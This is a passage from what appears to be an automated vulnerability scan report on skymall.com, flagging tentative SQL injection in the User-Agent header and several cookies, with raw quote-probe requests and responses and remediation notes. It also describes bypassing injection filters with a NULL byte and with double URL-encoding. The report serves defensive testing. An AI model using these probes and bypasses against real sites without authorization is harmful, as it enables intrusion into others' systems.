Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^''; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:20 GMT
Connection: close
Set-Cookie: JSESSIONID=97C9D88E0F29D4B189B73B1426DC318B.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:20 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497620543~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:20 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.8. http://www.skymall.com/shopping/dept.htm [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:41:41 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:41:41 GMT
Connection: close
Set-Cookie: JSESSIONID=0C8A6AA56CC73D3CBEEF37727E41AAF6.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:41 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497701387~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:41:41 GMT
Content-Length: 174579


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.9. http://www.skymall.com/shopping/dept.htm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337%00'; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:41:07 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337%00''; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:41:07 GMT
Connection: close
Set-Cookie: JSESSIONID=661C6910241139CDE77C4E8EDA9EF40B.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:07 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497667397~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:41:07 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.10. http://www.skymall.com/shopping/dept.htm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152'; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:57 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152''; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:58 GMT
Connection: close
Set-Cookie: JSESSIONID=F51A1FF59B77AD5F0673B58BB04BD366.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:57 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497657780~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:57 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.11. http://www.skymall.com/shopping/dept.htm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:41 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:42 GMT
Connection: close
Set-Cookie: JSESSIONID=30CAE16897945E36E06F0CB4739F0EE9.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:42 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497642619~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:42 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.12. http://www.skymall.com/shopping/dept.htm [cmRS cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The cmRS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cmRS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1'

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:41:24 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1''

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:41:24 GMT
Connection: close
Set-Cookie: JSESSIONID=E9E120E8CE495B9E84C7ECE21566D24E.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:24 GMT
